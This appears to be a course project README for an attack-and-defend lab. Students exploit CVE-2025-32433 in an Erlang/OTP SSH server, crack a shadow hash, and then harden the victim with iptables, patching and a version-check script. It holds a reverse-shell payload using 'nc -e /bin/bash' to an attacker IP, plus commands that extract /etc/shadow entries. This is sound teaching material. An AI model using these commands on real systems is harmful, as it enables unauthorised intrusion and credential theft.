## https://sploitus.com/exploit?id=305568CC-85F7-5A1B-8FAE-834B17D0B008
# Information Security Fundamentals - Spring 2026 Project
**Total Points:** 20 | **Deadline:** No late submissions accepted
## Overview
This project simulates a real-world attack-and-defend scenario across two virtual machines. You will exploit a critical pre-authentication RCE vulnerability (CVE-2025-32433) in an Erlang/OTP SSH server, crack extracted password hashes, and then harden the victim machine with firewall rules and patching.
| Role | OS |
|----------|----------------------------------------|
| Attacker | Kali Linux |
| Victim | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
## Files
| File | Description |
|------|-------------|
| `Debian-1.ova` | Pre-built victim VM image - **download separately, see [Resources](#resources)** (too large for GitHub) |
| `Project Spring 2026 - Google Docs.pdf` | Full project instructions with deliverables |
| `rockyou_txt.txt` | Wordlist used with John the Ripper to crack the extracted password hash |
## Resources
- **Victim VM (`Debian-1.ova`)**: [Download link](PASTE_VM_LINK_HERE) - too large (~3GB) to host on GitHub. Download separately and import into VirtualBox/VMware as described below.
- **Wordlist (`rockyou_txt.txt`)**: included in this repository, used for the password cracking step in Part 2.
## Setup
1. **Import VMs** - Load `Debian-1.ova` and your Kali Linux VM into VirtualBox/VMware.
2. **Network** - Set both VMs to **Host-Only Adapter** so they can communicate privately.
3. **Victim IP** - Boot the victim and run `ifconfig` to find its IP (typically in `192.168.56.0/24`).
---
## Part 1 - Vulnerable SSH Server Deployment & Exploitation (10 pts)
### Reconnaissance
```bash
# <VICTIM_IP> is the address found in Setup step 3
nmap -p 2222 -sV -A <VICTIM_IP>
```
Document open ports, service versions, and Erlang signatures.
### Exploit CVE-2025-32433 (Pre-Auth RCE)
> **Temporarily switch Kali to NAT** to clone the repo, then switch back to Host-Only.
```bash
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
```
Edit the script - set `HOST = "<VICTIM_IP>"` (the victim address from Setup step 3) and update the payload so the reverse shell connects back to your Kali VM (`<KALI_IP>`) on port 4444:
```python
command='os:cmd("nc -e /bin/bash <KALI_IP> 4444").'
```
**Terminal 1 (Kali)** - start listener:
```bash
nc -lvnp 4444
```
**Terminal 2 (Kali)** - launch exploit:
```bash
python3 CVE-2025-32433.py
```
In the reverse shell, run `whoami` and `hostname` to confirm access.
---
## Part 2 - Post-Exploitation & Password Cracking (5 pts)
### Extract and Crack the Hash
```bash
# On victim (via reverse shell): save testuser's /etc/shadow entry
grep '^testuser:' /etc/shadow > hash.txt
# Copy the contents of hash.txt to a file of the same name on Kali, then:
john --wordlist=rockyou_txt.txt hash.txt
```
Document the hash format (e.g., `$6$` = SHA-512), time taken, and the recovered plaintext password.
### Find the Flag
```bash
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
```
---
## Part 3 - Controls & Remediation (5 pts)
### Block the Attack Vector (iptables)
```bash
# Drop all inbound TCP to the vulnerable SSH port (rule is not persistent across reboots unless saved)
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
```
Re-run the Nmap scan and the exploit from Kali - document that Nmap now reports port 2222 as `filtered` and that the exploit fails.
### Patch the Vulnerability
Document the steps to upgrade Erlang/OTP to **v27.3.3 or later**, which contains the fix for CVE-2025-32433.
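As an added example (not part of the course materials), a small POSIX shell script for checking both Part 3 controls on the victim: `otp_status` classifies an Erlang/OTP version string against the fixed release the project names (27.3.3, so only the 27 branch is covered and other branches are reported as `unknown`), and `blocked_sources` summarises kernel log lines per source address. The logging rule, the log line format and the sample lines are assumptions constructed for the example.

```shell
# Added example: verify the Part 3 controls on the victim (not part of the
# course materials). Assumed companion rule, inserted ahead of the DROP rule
# so each blocked connection attempt is written to the kernel log:
#   sudo iptables -I INPUT -p tcp --dport 2222 --syn -j LOG --log-prefix "SSH2222-BLOCK: "

FIXED_MAJOR=27; FIXED_MINOR=3; FIXED_PATCH=3   # first fixed release named in the project

# otp_status VERSION -> vulnerable | patched | unknown
# Only the 27 branch is covered; the project names no fixed release for other
# branches, so those (and malformed input) are reported as "unknown".
otp_status() {
    # Split "27.3.2" into fields; absent fields count as 0 (so "27" means 27.0.0)
    IFS=. read -r major minor patch _rest <<EOF
$1
EOF
    case "$major.$minor.$patch" in
        *[!0-9.]*) echo unknown; return 0 ;;        # non-numeric input
    esac
    major=${major:-0}; minor=${minor:-0}; patch=${patch:-0}
    [ "$major" -eq "$FIXED_MAJOR" ] || { echo unknown; return 0; }
    if [ "$minor" -lt "$FIXED_MINOR" ] ||
       { [ "$minor" -eq "$FIXED_MINOR" ] && [ "$patch" -lt "$FIXED_PATCH" ]; }; then
        echo vulnerable
    else
        echo patched
    fi
}

# Constructed sample of kernel log lines: two blocked SYNs from the Kali box and
# one unrelated kernel message that must be ignored.
SAMPLE_LOG='Apr 20 10:01:02 victim kernel: SSH2222-BLOCK: IN=enp0s8 OUT= SRC=192.168.56.101 DST=192.168.56.102 PROTO=TCP SPT=51234 DPT=2222 SYN
Apr 20 10:01:03 victim kernel: SSH2222-BLOCK: IN=enp0s8 OUT= SRC=192.168.56.101 DST=192.168.56.102 PROTO=TCP SPT=51235 DPT=2222 SYN
Apr 20 10:01:04 victim kernel: e1000: enp0s8 NIC Link is Up 1000 Mbps'

# blocked_sources LOGTEXT -> one "<count> <src-ip>" line per source, busiest first.
# On the victim, feed it the live log: blocked_sources "$(dmesg)"
blocked_sources() {
    printf '%s\n' "$1" | grep 'SSH2222-BLOCK:' | grep -o 'SRC=[0-9.]*' \
        | cut -d= -f2 | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

otp_status 27.3.2                # vulnerable
blocked_sources "$SAMPLE_LOG"    # 2 192.168.56.101
```

Run `otp_status` against the version string reported by the victim's Erlang installation before and after the upgrade, and keep the `blocked_sources` output as evidence for the firewall before/after deliverable.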
---
## Deliverables
- Full report with screenshots of: scan, exploit execution, reverse shell (`whoami`/`hostname`), flag capture
- Firewall before/after documentation (Nmap results showing port state change)
- Written reflection explaining why pre-authentication RCEs are significantly more dangerous than post-authentication exploits
---
## CVE Reference
**CVE-2025-32433** - Critical pre-authentication remote code execution in the Erlang/OTP SSH server. Exploitable by sending malformed SSH packets before any credential exchange, giving an unauthenticated attacker full shell access.